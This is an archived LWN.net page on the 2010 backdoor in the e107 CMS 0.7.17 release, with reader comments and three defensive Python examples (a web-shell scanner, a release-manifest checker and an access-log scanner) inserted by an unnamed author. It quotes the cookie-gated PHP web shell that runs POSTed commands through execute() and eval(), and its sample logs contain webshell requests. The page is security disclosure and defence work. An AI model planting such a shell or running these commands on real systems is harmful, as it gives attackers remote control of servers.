<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
        "http://www.w3.org/TR/html4/loose.dtd">
        <html lang="en">
        <head><title>Backdoor in e107 CMS version 0.7.17 [LWN.net]</title>
        <meta name="twitter:card" content="summary" />
<meta name="twitter:site" content="@lwnnet" />
<meta name="twitter:title" content="Backdoor in e107 CMS version 0.7.17" />
<meta name="twitter:description" content="Bogdan Calin has reported an obvious backdoor in the e107 content management system (CMS) version 0.7.17.  The e107 developers have pulled the offending release and issued an update for anyone that is running the code.  In addition, they have enabled an update notification feature in the administrative interface for future problems.  Click below for the report to the Bugtraq mailing list.
" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
        <link rel="icon" href="https://static.lwn.net/images/favicon.png"
              type="image/png">
        <link rel="alternate" type="application/rss+xml" title="LWN.net headlines" href="https://lwn.net/headlines/newrss">
<link rel="alternate" type="application/rss+xml" title="Comments posted to this article" href="https://lwn.net/headlines/371110/">
        <link rel="stylesheet" href="/CSS/lwn">
<link rel="stylesheet" href="/CSS/nosub">
<link rel="stylesheet" href="/CSS/pure-min">
           <!--[if lte IE 8]>
             <link rel="stylesheet" href="/CSS/grids-responsive-old-ie-min">
           <![endif]-->
           <!--[if gt IE 8]><!-->
             <link rel="stylesheet" href="/CSS/grids-responsive-min">
           <!--<![endif]-->
           <link rel="stylesheet" href="/CSS/pure-lwn">
           
        

        </head>
        <body bgcolor="#ffffff" link="Blue" VLINK="Green" alink="Green">
        <a name="t"></a>
<div class="pure-grid maincolumn">
<div class="lwn-u-1 pure-u-md-19-24">
<div class="PageHeadline">
<h1>Backdoor in e107 CMS version 0.7.17</h1>
<div class="Byline">[Posted January 25, 2010 by jake]
               <p>
               </div>
</div>
<div class="ArticleText">
<table>
<tr><td valign="top"><b>From</b>:</td>
    	     <td>&nbsp;</td><td valign="top">Bogdan Calin &lt;bogdan-AT-acunetix.com&gt; </td></tr>
<tr><td valign="top"><b>To</b>:</td>
    	     <td>&nbsp;</td><td valign="top">full-disclosure-AT-lists.grok.org.uk </td></tr>
<tr><td valign="top"><b>Subject</b>:</td>
    	     <td>&nbsp;</td><td valign="top">e107 latest download link is backdoored </td></tr>
<tr><td valign="top"><b>Date</b>:</td>
    	     <td>&nbsp;</td><td valign="top">Mon, 25 Jan 2010 12:58:50 +0200</td></tr>
<tr><td valign="top"><b>Message-ID</b>:</td>
    	     <td>&nbsp;</td><td valign="top">&lt;4B5D796A.2020203@acunetix.com&gt;</td></tr>
<tr><td valign="top"><b>Cc</b>:</td>
    	     <td>&nbsp;</td><td valign="top">bugtraq-AT-securityfocus.com</td></tr>
<tr><td valign="top"><b>Archive-link</b>:</td>
    	     <td>&nbsp;</td><td valign="top"><a href="http://mid.gmane.org/4B5D796A.2020203@acunetix.com">Article</a>, <a
                 href="http://news.gmane.org/find-root.php?message_id=4B5D796A.2020203@acunetix.com">Thread</a>
              </td></tr>
</table><p><pre>
Hi guys,

The latest version of e107, version 0.7.17, contains a PHP backdoor.
<a href="http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip">http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip</a>

I've just downloaded this file and while looking through the code, I've
found the following piece of code:

file: class2.php, line: 1876

if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {

...

if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}

elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}

...

and so on.

I've informed the e107 guys about this situation.
For now, that link is not safe.

Look at the file date: class2.php has been modified on 2010-01-23, 21:52:26

-- 
Bogdan Calin - bogdan@acunetix.com
CTO
Acunetix Ltd. - <a href="http://www.acunetix.com">http://www.acunetix.com</a>
Acunetix Web Security Blog - <a href="http://www.acunetix.com/blog">http://www.acunetix.com/blog</a>


</pre>
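<p>The fragment quoted above is an unobfuscated web shell: a hard-coded md5 digest checked against a cookie acts as the password, and POST parameters go straight into a command-execution helper or eval(). The scanner below is an added example of mine, not part of Bogdan Calin's report or of e107; it walks a tree of PHP files and flags those three indicators. The regular expressions, the sample file names and the sample contents are my own constructions (the backdoored sample reproduces the quoted lines).</p>

```python
import re
import tempfile
from pathlib import Path

# Indicators for an unobfuscated PHP web shell of the kind quoted above:
# a hard-coded md5 "password" checked against a cookie, and request
# parameters fed straight into eval() or a command-execution function.
# The patterns are my own (assumption: one indicator per source line,
# no encoding or string splitting).
INDICATORS = {
    "cookie-hash-gate": re.compile(
        r"\bmd5\s*\(\s*\$_COOKIE\s*\[[^\]]*\]\s*\)\s*==+\s*['\"][0-9a-f]{32}['\"]"),
    "eval-of-request-input": re.compile(
        r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "exec-of-request-input": re.compile(
        r"\b(?:exec|shell_exec|system|passthru|popen|proc_open|execute)"
        r"\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
}


def scan_php_source(text):
    """Return (line_number, rule_name, stripped_line) for every indicator hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append((lineno, rule, line.strip()))
    return findings


def scan_tree(root):
    """Scan every *.php file below root; map relative path to its findings."""
    root = Path(root)
    results = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_php_source(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            results[path.relative_to(root).as_posix()] = hits
    return results


# Constructed sample files (PHP opening tags omitted, since the scanner is
# line based). The first reproduces the fragment quoted in the report; the
# second uses md5() and $_POST in ordinary, harmless ways.
BACKDOORED_PHP = """\
if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {
    if(!empty($_POST['cmd'])){
        $out = execute($_POST['cmd']);
    }
    elseif(!empty($_POST['php'])){
        ob_start();
        eval($_POST['php']);
        $out = ob_get_contents();
        ob_end_clean();
    }
}
"""

CLEAN_PHP = """\
$token = md5(uniqid('', true));
$name = htmlspecialchars($_POST['name']);
echo "Hello, $name";
"""


def demo():
    """Write both samples into a temporary tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "class2.php").write_text(BACKDOORED_PHP, encoding="utf-8")
        (root / "news.php").write_text(CLEAN_PHP, encoding="utf-8")
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        for lineno, rule, line in hits:
            print(f"{path}:{lineno}: {rule}: {line}")
```

<p>The scanner is deliberately line-oriented, so an encoded or multi-line variant of the same shell would slip past it; on a suspect install, pair it with the file-date check the report mentions (a core file whose modification time is later than the rest of the release) rather than relying on either signal alone.</p>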
<br clear="all"><hr width="60%" align="left">
           
</div> <!-- ArticleText -->
<p><a name="Comments"></a>

<a name="CommAnchor371133"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">Backdoor in e107 CMS version 0.7.17</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 26, 2010 2:34 UTC (Tue) by <b>busterb</b> (subscriber, #560)
       [<a href="/Articles/371133/">Link</a>]
    </p>
    <div class="FormattedComment">
BTW, it also appears that the linked website is covered in cialis link-spam, <br>
probably a result of the backdoor. Proceed with caution.<br>
</div>

  </div>
  

  <p>
  
</div>
<div class="Comment">

<a name="CommAnchor371196"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">Backdoor in e107 CMS version 0.7.17</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 26, 2010 14:22 UTC (Tue) by <b>cdman</b> (guest, #63220)
       [<a href="/Articles/371196/">Link</a>]
    </p>
    <div class="FormattedComment">
It seems to be fixed now and they also have a notification on their front page about a security update (although they could have used a bigger font :-)). Also, I couldn't find the given piece of code in their CVS repo, which probably means that only their website got hacked, not a dev...<br>
</div>

  </div>
  

  <p>
  
</div>
<div class="Comment">

<a name="CommAnchor371200"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">Backdoor in e107 CMS version 0.7.17</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 26, 2010 14:31 UTC (Tue) by <b>johill</b> (subscriber, #25196)
       [<a href="/Articles/371200/">Link</a>]
    </p>
    Are you sure? The security update on their page seems to say that 0.7.17 is the <b>solution</b>, while this article says it is the <b>problem</b>.
  </div>
  

  <p>
  
</div>
<div class="Comment">

<a name="CommAnchor371404"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">Backdoor in e107 CMS version 0.7.17</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 27, 2010 6:43 UTC (Wed) by <b>njs</b> (guest, #40338)
       [<a href="/Articles/371404/">Link</a>]
    </p>
    <div class="FormattedComment">
There's speculation on full-disclosure (click "Thread" above) that that security announcement about 0.7.17 is to fix a *different* hole... and that this other hole was used to compromise e107.org and insert this backdoor into the 0.7.17 "critical security fix, upgrade now if not sooner" release.<br>
</div>

  </div>
  

  <p>
  
</div>
<div class="Comment">

<a name="CommAnchor371636"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">Backdoor in e107 CMS version 0.7.17</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 28, 2010 10:34 UTC (Thu) by <b>epa</b> (subscriber, #39769)
       [<a href="/Articles/371636/">Link</a>]
    </p>
    <div class="FormattedComment">
Would using a hashing VCS such as Git have prevented this?  If we all became accustomed to instructions such as 'please upgrade to a4732abc41412' rather than 'please download foo-1.2.3.tar.gz', would it become more difficult to insert such backdoors?<br>
</div>

  </div>
  

  <p>
  
</div>
<div class="Comment">

<a name="CommAnchor371718"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">Backdoor in e107 CMS version 0.7.17</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 28, 2010 19:26 UTC (Thu) by <b>njs</b> (guest, #40338)
       [<a href="/Articles/371718/">Link</a>]
    </p>
    In principle it could help, but mostly by making it easier to recover after the repository was compromised (which doesn't seem to have happened here in any case). Presumably they would just change the website to say "please upgrade to 1412a4732abc8" or whatever and no-one would notice that either. Signatures could help in principle, but key management and achieving trust is its own barrel of worms, and these sorts of attacks are surprisingly rare; I'm not sure how much effort it's worth expending to defend against them.
<p>
If you *really* want to compromise the users of some project, it's pretty straightforward -- just come up with a plausible pseudonym, and send some legitimate patches that "accidentally" introduce an old-fashioned security bug. All the crypto in the world won't help with that. There are plenty of people you'd expect to be expending real resources on this, too -- militaries, criminals, heck, security researchers (who build their reputation and consulting business through finding bugs). The only reason I can think of that we haven't caught anyone at it yet is that earnest engineers produce enough security holes that people who depend on security holes mostly don't find it worth the bother trying to add more.

  </div>
  

  <p>
  
</div>
</div>
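<p>epa asks whether content-addressed identifiers would make this kind of substitution harder, and njs answers that they mostly help with recovery. As an added example of mine (not from either commenter, and not e107's tooling), the following computes the id Git assigns to a file's content (SHA-1 over a "blob SIZE" header, a NUL byte and the bytes, which is what git hash-object does), builds a per-file manifest of a release, and reports which files in a downloaded copy differ from the published manifest. File names and contents are constructed; the one real value is Git's well-known id for an empty file, used as a self-check.</p>

```python
import hashlib

# Git names a file's content by SHA-1 over the header "blob SIZE" followed
# by a NUL byte and the bytes themselves; this is what git hash-object
# computes, so an id announced by a maintainer can be recomputed locally.


def git_blob_id(data):
    """Return the Git object id (hex SHA-1) for a file with this content."""
    header = b"blob %d\x00" % len(data)
    return hashlib.sha1(header + data).hexdigest()


def release_manifest(files):
    """files: mapping of path to bytes. Returns mapping of path to content id."""
    return {path: git_blob_id(content) for path, content in files.items()}


def changed_files(published, downloaded):
    """Paths whose id differs between the two manifests (modified, missing or extra)."""
    paths = set(published) | set(downloaded)
    return sorted(p for p in paths if published.get(p) != downloaded.get(p))


# Git's well-known id for an empty file; used as a self-check of git_blob_id.
EMPTY_BLOB_ID = "e69de29bb2d1d6434b8b29ae775ad8c2e48c5391"

# Constructed release: the file names echo the report, the contents are mine.
PUBLISHED_RELEASE = {
    "class2.php": b"$admin = !empty($_SESSION['admin']);\n",
    "index.php": b"require_once('class2.php');\necho 'hello';\n",
}

# The same release as served from a compromised download site: class2.php
# gained a cookie-gated block like the one in the report, nothing else moved.
DOWNLOADED_RELEASE = dict(PUBLISHED_RELEASE)
DOWNLOADED_RELEASE["class2.php"] = PUBLISHED_RELEASE["class2.php"] + (
    b"if(md5($_COOKIE['access-admin']) == \"cf1afec15669cb96f09befb7d70f8bcb\") { /* backdoor body */ }\n"
)


def demo():
    """Compare a download against the manifest the maintainer published."""
    published = release_manifest(PUBLISHED_RELEASE)
    downloaded = release_manifest(DOWNLOADED_RELEASE)
    return {
        "self_check": git_blob_id(b"") == EMPTY_BLOB_ID,
        "changed": changed_files(published, downloaded),
        "class2_matches": published["class2.php"] == downloaded["class2.php"],
    }


if __name__ == "__main__":
    result = demo()
    print("git_blob_id self-check:", "ok" if result["self_check"] else "FAILED")
    print("files differing from the published manifest:", result["changed"])
```

<p>The comparison is only as good as the provenance of the published manifest: if the ids are served from the same compromised site as the archive, the attacker edits both, which is njs's point. They earn their keep when the ids reach the user through a channel the attacker does not control, such as a signed tag or an announcement archived elsewhere, and even then they identify which file to inspect rather than proving the release was ever clean.</p>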
</div>
</div>
</div>
</div>

<a name="CommAnchor371150"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">e107 + mod_php = evil</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 26, 2010 8:36 UTC (Tue) by <b>efexis</b> (guest, #26355)
       [<a href="/Articles/371150/">Link</a>]
    </p>
    <div class="FormattedComment">
Wow. Thanks guys. I've had SO much trouble thanks to that e107 software on a server I semi-manage where e107 was compromised and, with php running as a module within apache, with that single apache user for all virtual hosts, they pulled site config files w/mysql passwords off every other php based site, then all the user accounts details from all those databases, and some stuff even more serious (it was all very nicely logged! That &amp;cmd=xxx ended up in the apache logs as nearly all requests were GETs).<br>
<p>
It's such a disastrously insecure setup, yet very common, I'm completely amazed by it. Anyone running php virtual hosts out there, I highly recommend mod_fcgid, a rewrite of the earlier fastcgi that runs well and stable and talks to php instances that run under their own UIDs through pipes. In most cases it shouldn't need changes to existing php code, but in some cases it can do, however it's so worth it, php should not be run any other way*.<br>
<p>
(*or at all, there's -everything else- out there that's better!)<br>
<p>
</div>

  </div>
  

  <p>
  
</div>
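<p>efexis notes that the attacker's commands were visible in the Apache access log because nearly all the requests were GETs. As an added example of mine (not from the commenter), here is a small scan over combined-format log lines that flags requests whose query string carries the cmd or php parameter the quoted backdoor reads, with the values decoded, and separately counts POST requests, whose bodies an access log does not record. The log-line pattern, the parameter list and the sample lines (documentation-range addresses, invented times) are my own constructions.</p>

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache common/combined log prefix: client, ident, user, [timestamp],
# "request line", status, size. Pattern written by me for this example.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# The parameter names the quoted backdoor reads. Assumption: legitimate
# e107 pages do not use them, so any query string carrying one is suspect.
SUSPECT_PARAMS = {"cmd", "php"}


def parse_line(line):
    """Split one access-log line into its fields, or None if it does not parse."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def find_webshell_requests(lines):
    """Return (flagged, uninspectable_posts).

    flagged: one record per request whose query string carries a suspect
    parameter, with the decoded values so an analyst sees what was run.
    uninspectable_posts: number of POST requests. The access log never
    records a request body, so the backdoor's intended POST channel is
    invisible here and has to be checked from other evidence.
    """
    flagged = []
    posts = 0
    for raw in lines:
        entry = parse_line(raw)
        if entry is None:
            continue
        if entry["method"] == "POST":
            posts += 1
        url = urlsplit(entry["target"])
        params = parse_qs(url.query, keep_blank_values=True)
        hits = {k: v for k, v in params.items() if k in SUSPECT_PARAMS}
        if hits:
            flagged.append({
                "client": entry["client"],
                "ts": entry["ts"],
                "path": url.path,
                "status": entry["status"],
                "params": hits,
            })
    return flagged, posts


# Constructed sample log (documentation-range addresses, invented times).
SAMPLE_LOG = """\
203.0.113.7 - - [24/Jan/2010:03:12:45 +0000] "GET /class2.php?cmd=uname%20-a HTTP/1.1" 200 412
198.51.100.9 - - [24/Jan/2010:03:13:02 +0000] "GET /news.php?item=12&page=2 HTTP/1.1" 200 8812
203.0.113.7 - - [24/Jan/2010:03:14:10 +0000] "GET /class2.php?php=phpinfo%28%29%3B HTTP/1.1" 200 40211
203.0.113.7 - - [24/Jan/2010:03:15:00 +0000] "POST /class2.php HTTP/1.1" 200 219
this line is not an access-log entry and is skipped
"""


if __name__ == "__main__":
    flagged, posts = find_webshell_requests(SAMPLE_LOG.splitlines())
    for f in flagged:
        print(f"{f['ts']} {f['client']} {f['path']} {f['status']} {f['params']}")
    print(f"{posts} POST request(s) whose bodies are not in the access log")
```

<p>A request that used the backdoor's intended POST channel appears only as a POST to the script with nothing to inspect, so the POST count is the cue to move to body-level evidence (a web application firewall's audit log, or a request-body capture) rather than to read a clean result as a clean box. As efexis describes, the more useful lesson is structural: with mod_php every virtual host runs as the one Apache user, so one compromised application reaches every other site's configuration files; per-site process users via FastCGI limit what a single web shell can read.</p>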
<div class="Comment">

<a name="CommAnchor371199"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">e107 + mod_php = evil</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 26, 2010 14:28 UTC (Tue) by <b>cortana</b> (guest, #24596)
       [<a href="/Articles/371199/">Link</a>]
    </p>
    <div class="FormattedComment">
Huge AOL on mod_fcgid. I can't understand why it's not used _everywhere_.<br>
<p>
I hope it makes it into apache httpd proper some day!<br>
</div>

  </div>
  

  <p>
  
</div>
</div>
</div>
</div> <!-- pure-grid -->

        <br clear="all">
        <center>
        <P>
        <font size="-2">
        Copyright &copy; 2010, Eklektix, Inc.<BR>
        
        Comments and public postings are copyrighted by their creators.<br>
        Linux  is a registered trademark of Linus Torvalds<br>
        </font>
        </center>
        
            
        </body></html>
        